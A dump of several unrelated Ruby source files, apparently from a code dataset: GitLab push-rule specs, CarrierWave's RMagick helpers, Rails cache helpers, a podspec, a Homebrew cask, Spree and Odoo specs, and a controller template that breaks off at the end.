it 'attempts to use safe RE2 regex engine' do
expect_any_instance_of(Gitlab::UntrustedRegexp).to receive(:===)
subject.branch_name_allowed?('ee-feature-ee')
end
it 'falls back to ruby regex engine' do
push_rule.update_column(:branch_name_regex, '(ee|ce).*\1')
expect(subject.branch_name_allowed?('ee-feature-ee')).to be true
expect(subject.branch_name_allowed?('ee-feature-ce')).to be false
end
end
end
describe '#commit_message_allowed?' do
subject(:push_rule) { create(:push_rule, commit_message_regex: '^Signed-off-by')}
it 'uses multiline regex' do
commit_message = "Some git commit feature\n\nSigned-off-by: Someone"
expect(subject.commit_message_allowed?(commit_message)).to be true
end
end
describe '#commit_validation?' do
let(:settings_with_global_default) { %i(reject_unsigned_commits) }
where(:setting, :value, :result) do
:commit_message_regex | 'regex' | true
:branch_name_regex | 'regex' | true
:author_email_regex | 'regex' | true
:file_name_regex | 'regex' | true
:reject_unsigned_commits | true | true
:commit_committer_check | true | true
:member_check | true | true
:prevent_secrets | true | true
:max_file_size | 1 | false
end
with_them do
context "when rule is enabled at global level" do
before do
global_push_rule.update_column(setting, value)
end
it "returns the default value at project level" do
rule = project.push_rule
if settings_with_global_default.include?(setting)
rule.update_column(setting, nil)
end
expect(rule.commit_validation?).to eq(result)
end
end
end
end
methods_and_regexes = {
commit_message_allowed?: :commit_message_regex,
branch_name_allowed?: :branch_name_regex,
author_email_allowed?: :author_email_regex,
filename_blacklisted?: :file_name_regex
}
methods_and_regexes.each do |method_name, regex_attr|
describe "##{method_name}" do
it 'raises a MatchError when the regex is invalid' do
push_rule[regex_attr] = '+'
expect { push_rule.public_send(method_name, 'foo') } # rubocop:disable GitlabSecurity/PublicSend
.to raise_error(PushRule::MatchError, /\ARegular expression '\+' is invalid/)
end
end
end
describe '#commit_signature_allowed?' do
let!(:premium_license) { create(:license, plan: License::PREMIUM_PLAN) }
let(:signed_commit) { double(has_signature?: true) }
let(:unsigned_commit) { double(has_signature?: false) }
context 'when feature is not licensed and it is enabled' do
before do
stub_licensed_features(reject_unsigned_commits: false)
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'accepts unsigned commits' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
end
context 'when enabled at a global level' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
context 'and disabled at a Project level' do
it 'returns true if commit is not signed' do
push_rule.update_attribute(:reject_unsigned_commits, false)
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
end
context 'and unset at a Project level' do
it 'returns false if commit is not signed' do
push_rule.update_attribute(:reject_unsigned_commits, nil)
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
end
end
context 'when disabled at a global level' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, false)
end
it 'returns true if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
context 'but enabled at a Project level' do
before do
push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
it 'returns true if commit is signed' do
expect(push_rule.commit_signature_allowed?(signed_commit)).to eq(true)
end
end
context 'when user has enabled and disabled it at a project level' do
before do
# Let's test with the same boolean values that are sent through the form
push_rule.update_attribute(:reject_unsigned_commits, '1')
push_rule.update_attribute(:reject_unsigned_commits, '0')
end
context 'and it is enabled globally' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
it 'returns true if commit is signed' do
expect(push_rule.commit_signature_allowed?(signed_commit)).to eq(true)
end
end
end
end
end
describe '#available?' do
shared_examples 'an unavailable push_rule' do
it 'is not available' do
expect(push_rule.available?(:reject_unsigned_commits)).to eq(false)
end
end
shared_examples 'an available push_rule' do
it 'is available' do
expect(push_rule.available?(:reject_unsigned_commits)).to eq(true)
end
end
describe 'reject_unsigned_commits' do
context 'with the global push_rule' do
let(:push_rule) { create(:push_rule_sample) }
context 'with a EE starter license' do
let!(:license) { create(:license, plan: License::STARTER_PLAN) }
it_behaves_like 'an unavailable push_rule'
end
context 'with a EE premium license' do
let!(:license) { create(:license, plan: License::PREMIUM_PLAN) }
it_behaves_like 'an available push_rule'
end
end
context 'with GL.com plans' do
let(:group) { create(:group, plan: plan) }
let(:project) { create(:project, namespace: group) }
let(:push_rule) { create(:push_rule, project: project) }
before do
create(:license, plan: License::PREMIUM_PLAN)
stub_application_setting(check_namespace_plan: true)
end
context 'with a Bronze plan' do
let(:plan) { :bronze_plan }
it_behaves_like 'an unavailable push_rule'
end
context 'with a Silver plan' do
let(:plan) { :silver_plan }
it_behaves_like 'an available push_rule'
end
context 'with a Gold plan' do
let(:plan) { :gold_plan }
it_behaves_like 'an available push_rule'
end
end
end
end
end
| 31.735192 | 110 | 0.657115 |
5d240c76d304e4161b5a7552f8a64bb87b704da1 | 10,962 | # encoding: utf-8
module CarrierWave
##
# This module simplifies manipulation with RMagick by providing a set
# of convenient helper methods. If you want to use them, you'll need to
# require this file:
#
# require 'carrierwave/processing/rmagick'
#
# And then include it in your uploader:
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
# end
#
# You can now use the provided helpers:
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
#
# process :resize_to_fit => [200, 200]
# end
#
# Or create your own helpers with the powerful manipulate! method. Check
# out the RMagick docs at http://www.imagemagick.org/RMagick/doc/ for more
# info
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
#
# process :do_stuff => 10.0
#
# def do_stuff(blur_factor)
# manipulate! do |img|
# img = img.sepiatone
# img = img.auto_orient
# img = img.radial_blur(blur_factor)
# end
# end
# end
#
# === Note
#
# You should be aware how RMagick handles memory. manipulate! takes care
# of freeing up memory for you, but for optimum memory usage you should
# use destructive operations as much as possible:
#
# DON'T DO THIS:
# img = img.resize_to_fit
#
# DO THIS INSTEAD:
# img.resize_to_fit!
#
# Read this for more information why:
#
# http://rubyforge.org/forum/forum.php?thread_id=1374&forum_id=1618
#
module RMagick
extend ActiveSupport::Concern
included do
begin
require "rmagick"
rescue LoadError
require "RMagick"
rescue LoadError => e
e.message << " (You may need to install the rmagick gem)"
raise e
end
end
module ClassMethods
def convert(format)
process :convert => format
end
def resize_to_limit(width, height)
process :resize_to_limit => [width, height]
end
def resize_to_fit(width, height)
process :resize_to_fit => [width, height]
end
def resize_to_fill(width, height, gravity=::Magick::CenterGravity)
process :resize_to_fill => [width, height, gravity]
end
def resize_and_pad(width, height, background=:transparent, gravity=::Magick::CenterGravity)
process :resize_and_pad => [width, height, background, gravity]
end
def resize_to_geometry_string(geometry_string)
process :resize_to_geometry_string => [geometry_string]
end
end
##
# Changes the image encoding format to the given format
#
# See even http://www.imagemagick.org/RMagick/doc/magick.html#formats
#
# === Parameters
#
# [format (#to_s)] an abreviation of the format
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
# === Examples
#
# image.convert(:png)
#
def convert(format)
manipulate!(:format => format)
@format = format
end
##
# Resize the image to fit within the specified dimensions while retaining
# the original aspect ratio. Will only resize the image if it is larger than the
# specified dimensions. The resulting image may be shorter or narrower than specified
# in the smaller dimension but will not be larger than the specified values.
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_limit(width, height)
manipulate! do |img|
geometry = Magick::Geometry.new(width, height, 0, 0, Magick::GreaterGeometry)
new_img = img.change_geometry(geometry) do |new_width, new_height|
img.resize(new_width, new_height)
end
destroy_image(img)
new_img = yield(new_img) if block_given?
new_img
end
end
##
# From the RMagick documentation: "Resize the image to fit within the
# specified dimensions while retaining the original aspect ratio. The
# image may be shorter or narrower than specified in the smaller dimension
# but will not be larger than the specified values."
#
# See even http://www.imagemagick.org/RMagick/doc/image3.html#resize_to_fit
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_fit(width, height)
manipulate! do |img|
img.resize_to_fit!(width, height)
img = yield(img) if block_given?
img
end
end
##
# From the RMagick documentation: "Resize the image to fit within the
# specified dimensions while retaining the aspect ratio of the original
# image. If necessary, crop the image in the larger dimension."
#
# See even http://www.imagemagick.org/RMagick/doc/image3.html#resize_to_fill
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_fill(width, height, gravity=::Magick::CenterGravity)
manipulate! do |img|
img.crop_resized!(width, height, gravity)
img = yield(img) if block_given?
img
end
end
##
# Resize the image to fit within the specified dimensions while retaining
# the original aspect ratio. If necessary, will pad the remaining area
# with the given color, which defaults to transparent (for gif and png,
# white for jpeg).
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
# [background (String, :transparent)] the color of the background as a hexcode, like "#ff45de"
# [gravity (Magick::GravityType)] how to position the image
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_and_pad(width, height, background=:transparent, gravity=::Magick::CenterGravity)
manipulate! do |img|
img.resize_to_fit!(width, height)
new_img = ::Magick::Image.new(width, height) { self.background_color = background == :transparent ? 'rgba(255,255,255,0)' : background.to_s }
if background == :transparent
filled = new_img.matte_floodfill(1, 1)
else
filled = new_img.color_floodfill(1, 1, ::Magick::Pixel.from_color(background))
end
destroy_image(new_img)
filled.composite!(img, gravity, ::Magick::OverCompositeOp)
destroy_image(img)
filled = yield(filled) if block_given?
filled
end
end
##
# Resize the image per the provided geometry string.
#
# === Parameters
#
# [geometry_string (String)] the proportions in which to scale image
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_geometry_string(geometry_string)
manipulate! do |img|
new_img = img.change_geometry(geometry_string) do |new_width, new_height|
img.resize(new_width, new_height)
end
destroy_image(img)
new_img = yield(new_img) if block_given?
new_img
end
end
##
# Manipulate the image with RMagick. This method will load up an image
# and then pass each of its frames to the supplied block. It will then
# save the image to disk.
#
# === Gotcha
#
# This method assumes that the object responds to +current_path+.
# Any class that this module is mixed into must have a +current_path+ method.
# CarrierWave::Uploader does, so you won't need to worry about this in
# most cases.
#
# === Yields
#
# [Magick::Image] manipulations to perform
# [Integer] Frame index if the image contains multiple frames
# [Hash] options, see below
#
# === Options
#
# The options argument to this method is also yielded as the third
# block argument.
#
# Currently, the following options are defined:
#
# ==== :write
# A hash of assignments to be evaluated in the block given to the RMagick write call.
#
# An example:
#
# manipulate! do |img, index, options|
# options[:write] = {
# :quality => 50,
# :depth => 8
# }
# img
# end
#
# This will translate to the following RMagick::Image#write call:
#
# image.write do |img|
# self.quality = 50
# self.depth = 8
# end
#
# ==== :read
# A hash of assignments to be given to the RMagick read call.
#
# The options available are identical to those for write, but are passed in directly, like this:
#
# manipulate! :read => { :density => 300 }
#
# ==== :format
# Specify the output format. If unset, the filename extension is used to determine the format.
#
# === Raises
#
# [CarrierWave::ProcessingError] if manipulation failed.
#
def manipulate!(options={}, &block)
cache_stored_file! if !cached?
read_block = create_info_block(options[:read])
image = ::Magick::Image.read(current_path, &read_block)
frames = ::Magick::ImageList.new
image.each_with_index do |frame, index|
frame = yield *[frame, index, options].take(block.arity) if block_given?
frames << frame if frame
end
frames.append(true) if block_given?
write_block = create_info_block(options[:write])
if options[:format] || @format
frames.write("#{options[:format] || @format}:#{current_path}", &write_block)
move_to = current_path.chomp(File.extname(current_path)) + ".#{options[:format] || @format}"
file.move_to(move_to, permissions, directory_permissions)
else
frames.write(current_path, &write_block)
end
destroy_image(frames)
rescue ::Magick::ImageMagickError => e
raise CarrierWave::ProcessingError, I18n.translate(:"errors.messages.rmagick_processing_error", :e => e, :default => I18n.translate(:"errors.messages.rmagick_processing_error", :e => e, :locale => :en))
end
private
def create_info_block(options)
return nil unless options
assignments = options.map { |k, v| "self.#{k} = #{v}" }
code = "lambda { |img| " + assignments.join(";") + "}"
eval code
end
def destroy_image(image)
image.destroy! if image.respond_to?(:destroy!)
end
end # RMagick
end # CarrierWave
| 30.792135 | 208 | 0.627349 |
79cba3d3dc3a9e225a17eddd11bcfce2622e8c40 | 451 | class CreateBlogPosts < ActiveRecord::Migration[5.1]
def change
create_table :blog_posts do |t|
t.string :title
t.string :post_image
t.text :body
t.references :user, foreign_key: true
t.integer :status
t.integer :post_type
t.boolean :post_public
t.boolean :post_published
t.integer :numComments
t.datetime :publication_date
t.string :author
t.timestamps
end
end
end
| 22.55 | 52 | 0.651885 |
b9ef63243a36504a4502e1a168fc95d91c46e28e | 224 | unless defined?(APP_PATH)
if File.exist?(File.expand_path("test/dummy/config/application.rb", ENGINE_ROOT))
APP_PATH = File.expand_path("test/dummy/config/application", ENGINE_ROOT)
end
end
require "rails/commands"
| 28 | 83 | 0.767857 |
62e95993d940e3c852f4620c4190e2a611ea81f3 | 345 | cask :v1 => 'itools' do
version '2.4.6'
sha256 '412dcd5a082ebf88566a4422e4c1d127e063a65ad9d8f3917e0b29e871da6783'
# itools.hk is the official download host per the vendor homepage
url "http://dl2.itools.hk/dl/iTools_#{version}.dmg"
name 'iTools'
homepage 'http://pro.itools.cn/mac/english'
license :gratis
app 'iTools.app'
end
| 26.538462 | 75 | 0.73913 |
bb733b52b3402887501741c5d16fca009d9a49fc | 5,287 | #
# Be sure to run `pod spec lint testPod.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
spec.name = "MADPCommonComponents"
spec.version = "0.0.1"
spec.summary = "A example for Pod."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
spec.description = <<-DESC
detail is a example for Pod.
DESC
spec.homepage = "https://github.com/whisper1ee/MADPCommonComponents"
# spec.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See https://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
spec.license = "MIT"
# spec.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
spec.author = { "whisper" => "[email protected]" }
# Or just: spec.author = "whisper"
# spec.authors = { "whisper" => "[email protected]" }
# spec.social_media_url = "https://twitter.com/whisper"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# spec.platform = :ios
spec.platform = :ios, "9.0"
# When using multiple platforms
# spec.ios.deployment_target = "5.0"
# spec.osx.deployment_target = "10.7"
# spec.watchos.deployment_target = "2.0"
# spec.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
spec.source = { :git => "https://github.com/whisper1ee/MADPCommonComponents.git", :tag => "#{spec.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
# spec.source_files = "MADPGesture.framework/*.{h,m}","MADPGesture.framework"
# spec.exclude_files = "Classes/Exclude"
# spec.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# spec.resource = "icon.png"
# spec.resources = "Resources/*.png"
# spec.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
spec.frameworks = "Foundation", "UIKit", "CoreLocation"
spec.vendored_frameworks = "MADPCommonComponents.framework"
# spec.framework = "SomeFramework"
# spec.library = "iconv"
# spec.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
spec.requires_arc = true
# spec.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# spec.dependency "JSONKit", "~> 1.4"
end
| 37.496454 | 117 | 0.60488 |
bf1c8ceaed3aede449629dd3ac3a190b585357b7 | 10,688 | module ActionView
# = Action View Cache Helper
module Helpers
module CacheHelper
# This helper exposes a method for caching fragments of a view
# rather than an entire action or page. This technique is useful
# caching pieces like menus, lists of new topics, static HTML
# fragments, and so on. This method takes a block that contains
# the content you wish to cache.
#
# The best way to use this is by doing key-based cache expiration
# on top of a cache store like Memcached that'll automatically
# kick out old entries. For more on key-based expiration, see:
# http://signalvnoise.com/posts/3113-how-key-based-cache-expiration-works
#
# When using this method, you list the cache dependency as the name of the cache, like so:
#
# <% cache project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# This approach will assume that when a new topic is added, you'll touch
# the project. The cache key generated from this call will be something like:
#
# views/projects/123-20120806214154/7a1156131a6928cb0026877f8b749ac9
# ^class ^id ^updated_at ^template tree digest
#
# The cache is thus automatically bumped whenever the project updated_at is touched.
#
# If your template cache depends on multiple sources (try to avoid this to keep things simple),
# you can name all these dependencies as part of an array:
#
# <% cache [ project, current_user ] do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# This will include both records as part of the cache key and updating either of them will
# expire the cache.
#
# ==== \Template digest
#
# The template digest that's added to the cache key is computed by taking an MD5 of the
# contents of the entire template file. This ensures that your caches will automatically
# expire when you change the template file.
#
# Note that the MD5 is taken of the entire template file, not just what's within the
# cache do/end call. So it's possible that changing something outside of that call will
# still expire the cache.
#
# Additionally, the digestor will automatically look through your template file for
# explicit and implicit dependencies, and include those as part of the digest.
#
# The digestor can be bypassed by passing skip_digest: true as an option to the cache call:
#
# <% cache project, skip_digest: true do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# ==== Implicit dependencies
#
# Most template dependencies can be derived from calls to render in the template itself.
# Here are some examples of render calls that Cache Digests knows how to decode:
#
# render partial: "comments/comment", collection: commentable.comments
# render "comments/comments"
# render 'comments/comments'
# render('comments/comments')
#
# render "header" translates to render("comments/header")
#
# render(@topic) translates to render("topics/topic")
# render(topics) translates to render("topics/topic")
# render(message.topics) translates to render("topics/topic")
#
# It's not possible to derive all render calls like that, though.
# Here are a few examples of things that can't be derived:
#
# render group_of_attachments
# render @project.documents.where(published: true).order('created_at')
#
# You will have to rewrite those to the explicit form:
#
# render partial: 'attachments/attachment', collection: group_of_attachments
# render partial: 'documents/document', collection: @project.documents.where(published: true).order('created_at')
#
# === Explicit dependencies
#
# Sometimes you'll have template dependencies that can't be derived at all. This is typically
# the case when you have template rendering that happens in helpers. Here's an example:
#
# <%= render_sortable_todolists @project.todolists %>
#
# You'll need to use a special comment format to call those out:
#
# <%# Template Dependency: todolists/todolist %>
# <%= render_sortable_todolists @project.todolists %>
#
# In some cases, like a single table inheritance setup, you might have
# a bunch of explicit dependencies. Instead of writing every template out,
# you can use a wildcard to match any template in a directory:
#
# <%# Template Dependency: events/* %>
# <%= render_categorizable_events @person.events %>
#
# This marks every template in the directory as a dependency. To find those
# templates, the wildcard path must be absolutely defined from app/views or paths
# otherwise added with +prepend_view_path+ or +append_view_path+.
# This way the wildcard for `app/views/recordings/events` would be `recordings/events/*` etc.
#
# The pattern used to match explicit dependencies is <tt>/# Template Dependency: (\S+)/</tt>,
# so it's important that you type it out just so.
# You can only declare one template dependency per line.
#
# === External dependencies
#
# If you use a helper method, for example, inside a cached block and
# you then update that helper, you'll have to bump the cache as well.
# It doesn't really matter how you do it, but the MD5 of the template file
# must change. One recommendation is to simply be explicit in a comment, like:
#
# <%# Helper Dependency Updated: May 6, 2012 at 6pm %>
# <%= some_helper_method(person) %>
#
# Now all you have to do is change that timestamp when the helper method changes.
#
# === Collection Caching
#
# When rendering a collection of objects that each use the same partial, a `cached`
# option can be passed.
#
# For collections rendered such:
#
# <%= render partial: 'projects/project', collection: @projects, cached: true %>
#
# The `cached: true` will make Action View's rendering read several templates
# from cache at once instead of one call per template.
#
# Templates in the collection not already cached are written to cache.
#
# Works great alongside individual template fragment caching.
# For instance if the template the collection renders is cached like:
#
# # projects/_project.html.erb
# <% cache project do %>
# <%# ... %>
# <% end %>
#
# Any collection renders will find those cached templates when attempting
# to read multiple templates at once.
#
# If your collection cache depends on multiple sources (try to avoid this to keep things simple),
# you can name all these dependencies as part of a block that returns an array:
#
# <%= render partial: 'projects/project', collection: @projects, cached: -> project { [ project, current_user ] } %>
#
# This will include both records as part of the cache key and updating either of them will
# expire the cache.
def cache(name = {}, options = {}, &block)
if controller.respond_to?(:perform_caching) && controller.perform_caching
name_options = options.slice(:skip_digest, :virtual_path)
safe_concat(fragment_for(cache_fragment_name(name, name_options), options, &block))
else
yield
end
nil
end
# Cache fragments of a view if +condition+ is true
#
# <% cache_if admin?, project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
def cache_if(condition, name = {}, options = {}, &block)
if condition
cache(name, options, &block)
else
yield
end
nil
end
# Cache fragments of a view unless +condition+ is true
#
# <% cache_unless admin?, project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
def cache_unless(condition, name = {}, options = {}, &block)
cache_if !condition, name, options, &block
end
# This helper returns the name of a cache key for a given fragment cache
# call. By supplying +skip_digest:+ true to cache, the digestion of cache
# fragments can be manually bypassed. This is useful when cache fragments
# cannot be manually expired unless you know the exact key which is the
# case when using memcached.
#
# The digest will be generated using +virtual_path:+ if it is provided.
#
def cache_fragment_name(name = {}, skip_digest: nil, virtual_path: nil)
if skip_digest
name
else
fragment_name_with_digest(name, virtual_path)
end
end
attr_reader :cache_hit # :nodoc:
private
def fragment_name_with_digest(name, virtual_path) #:nodoc:
virtual_path ||= @virtual_path
if virtual_path
name = controller.url_for(name).split("://").last if name.is_a?(Hash)
digest = Digestor.digest name: virtual_path, finder: lookup_context, dependencies: view_cache_dependencies
[ name, digest ]
else
name
end
end
def fragment_for(name = {}, options = nil, &block) #:nodoc:
if content = read_fragment_for(name, options)
@cache_hit = true
content
else
@cache_hit = false
write_fragment_for(name, options, &block)
end
end
def read_fragment_for(name, options) #:nodoc:
controller.read_fragment(name, options)
end
def write_fragment_for(name, options) #:nodoc:
# VIEW TODO: Make #capture usable outside of ERB
# This dance is needed because Builder can't use capture
pos = output_buffer.length
yield
output_safe = output_buffer.html_safe?
fragment = output_buffer.slice!(pos..-1)
if output_safe
self.output_buffer = output_buffer.class.new(output_buffer)
end
controller.write_fragment(name, fragment, options)
end
end
end
end
| 41.426357 | 124 | 0.628743 |
4a691a35c3402edb7ab1d478082d6ef0e2ab12d3 | 336 | class Benchmarker
def initialize(target, size)
end
def setup
end
def generate
end
def run(args=nil)
# Just running help is probably a good proxy of a full startup.
# Simply asking for the version might also be good, but it would miss all
# of the app searching and loading parts
`puppet help`
end
end
| 18.666667 | 77 | 0.696429 |
871d0bc09a7b96b3d5b2c8f80b687ddd8fcd95a5 | 1,530 | require 'spec_helper'
module Spree
module Stock
module Splitter
describe ShippingCategory do
let(:variant1) { build(:variant) }
let(:variant2) { build(:variant) }
let(:shipping_category_1) { create(:shipping_category, name: 'A') }
let(:shipping_category_2) { create(:shipping_category, name: 'B') }
def inventory_unit1
build(:inventory_unit, variant: variant1).tap do |inventory_unit|
inventory_unit.variant.product.shipping_category = shipping_category_1
end
end
def inventory_unit2
build(:inventory_unit, variant: variant2).tap do |inventory_unit|
inventory_unit.variant.product.shipping_category = shipping_category_2
end
end
let(:packer) { build(:stock_packer) }
subject { ShippingCategory.new(packer) }
it 'splits each package by shipping category' do
package1 = Package.new(packer.stock_location)
4.times { package1.add inventory_unit1 }
8.times { package1.add inventory_unit2 }
package2 = Package.new(packer.stock_location)
6.times { package2.add inventory_unit1 }
9.times { package2.add inventory_unit2, :backordered }
packages = subject.split([package1, package2])
packages[0].quantity.should eq 4
packages[1].quantity.should eq 8
packages[2].quantity.should eq 6
packages[3].quantity.should eq 9
end
end
end
end
end
| 31.22449 | 82 | 0.637255 |
1880f84ecff209c61d00fe95e31b4b751d5f27b2 | 1,789 | require 'spec_helper'
describe 'odoo::repo9' do
let(:pre_condition) do
[
'class apt() {}',
'define apt::key($ensure, $id, $source) {}',
'define apt::source($ensure, $location, $comment, $release, $repos, $include) {}',
'class apt::update() {}'
]
end
let!(:stdlib_stubs) do
MockFunction.new('create_ini_settings', type: :statement) do |_f|
end
end
context 'with defaults for all parameters (Debian)' do
let :facts do
{
osfamily: 'Debian'
}
end
it do
should contain_class('odoo::repo9').only_with(
ensure: 'present',
descr: 'Odoo Nightly repository',
key_id: '5D134C924CB06330DCEFE2A1DEF2A2198183CBB5',
key_url: 'https://nightly.odoo.com/odoo.key',
pkg_url: nil,
release: './',
repos: ''
)
should contain_apt__key('odookey').with(
ensure: 'present',
id: '5D134C924CB06330DCEFE2A1DEF2A2198183CBB5',
source: 'https://nightly.odoo.com/odoo.key'
)
should contain_apt__source('odoo').with(
ensure: 'present',
location: 'http://nightly.odoo.com/9.0/nightly/deb/',
comment: 'Odoo Nightly repository',
release: './',
include: { 'src' => false }
)
should contain_exec('update-odoo-repos').with(
refreshonly: true,
command: '/bin/true'
)
end
end
context 'with defaults for all parameters (RedHat)' do
let :facts do
{
osfamily: 'RedHat'
}
end
it do
should contain_yumrepo('odoo').with(
ensure: 'present',
descr: 'Odoo Nightly repository',
baseurl: 'http://nightly.odoo.com/9.0/nightly/rpm/',
enabled: 1,
gpgcheck: 0
)
end
end
end
| 24.175676 | 88 | 0.568474 |
26c064faf3b69c67177df328180556bb533067d5 | 511 | class FakeStarReadingResultGenerator
def initialize(student, options = {}, index)
@student = student
@index = index
@start_date = options.fetch(:start_date)
@days_between_tests = options.fetch(:days_between_tests)
end
def next
return {
date_taken: @start_date + (@index * @days_between_tests),
percentile_rank: rand(10..99),
grade_equivalent: ["0.00", "4.00", "5.70", "2.60"].sample,
student_id: @student.id,
total_time: rand(1000..1800)
}
end
end
| 26.894737 | 64 | 0.65362 |
214381b0b45490462eed1ebe1326197b3325fe4d | 296 | module AppleNews
module Component
module ScalableImage
extend ActiveSupport::Concern
included do
required_property :url
optional_properties :accessibility_caption, :caption, :explicit_content
property_inflection :url, 'URL'
end
end
end
end
| 19.733333 | 79 | 0.692568 |
87865b7aa1d5b37ac0d3b6fee05d5a120e3d6388 | 237 | # frozen_string_literal: true
FactoryBot.define do
factory :review do
association :account
association :project
title { Faker::Lorem.characters(number: 16) }
comment { Faker::Lorem.characters(number: 1024) }
end
end
| 21.545455 | 53 | 0.7173 |
33c2290759041c90a751a0670cc54795ab58248e | 170 | class Process
class << self
def on(event, &callback)
`process.on(#{event}, #{callback})`
end
def platform
`process.platform`
end
end
end
| 14.166667 | 41 | 0.582353 |
d50ffc79af7d680241f755472e6ce1f3509bc501 | 257 | # frozen_string_literal: true
module Lokalise
module Collections
class Translation < Base
class << self
def endpoint(project_id, *_args)
path_from projects: [project_id, 'translations']
end
end
end
end
end
| 18.357143 | 58 | 0.642023 |
4a54ae6ad55f035e10b16a14971fbbdd3e61ea1d | 1,437 | class <%= controller_name %> < Application
# provides :xml, :yaml, :js
def index
@<%= plural_name %> = <%= class_name %>.all
display @<%= plural_name %>
end
def show(id)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
display @<%= name %>
end
def new
only_provides :html
@<%= name %> = <%= class_name %>.new
display @<%= name %>, :form
end
def edit(id)
only_provides :html
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
display @<%= name %>, :form
end
def create(<%= name %>)
@<%= name %> = <%= class_name %>.new(<%= name %>)
if @<%= name %>.save
redirect resource(@<%= name %>), :message => {:notice => "<%= class_name %> was successfully created"}
else
message[:error] = "<%= class_name %> failed to be created"
display @<%= name %>, :form
end
end
def update(id, <%= name %>)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
if @<%= name %>.update_attributes(<%= name %>)
redirect resource(@<%= name %>)
else
display @<%= name %>, :form
end
end
def destroy(id)
@<%= name %> = <%= class_name %>.get(id)
raise NotFound unless @<%= name %>
if @<%= name %>.destroy
redirect resource(:<%= plural_name %>)
else
raise InternalServerError
